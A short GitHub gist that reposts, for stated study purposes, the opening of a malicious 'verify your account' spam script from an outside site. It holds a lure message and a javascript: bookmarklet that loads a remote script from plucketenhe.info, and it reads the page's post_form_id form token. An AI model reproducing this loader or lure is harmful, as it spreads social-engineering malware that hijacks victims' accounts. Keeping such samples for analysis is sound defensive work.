Skip to content

Instantly share code, notes, and snippets.

View lawrencekgrant's full-sized avatar

Lawrence Grant lawrencekgrant

View GitHub Profile
/*
THIS CODE IS FROM http://plucketenhe.info/verify.js
I AM POSTING IT HERE JUST TO BE ABLE TO STUDY IT. IT IS NOT MINE.
*/
var message = "In order to PREVENT SPAM, I ask that you VERIFY YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to start the process...";
var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://plucketenhe.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
var myText = "==>[VERIFY MY ACCOUNT]<==";
var post_form_id = document.getElementsByName('post_form_id')[0].value;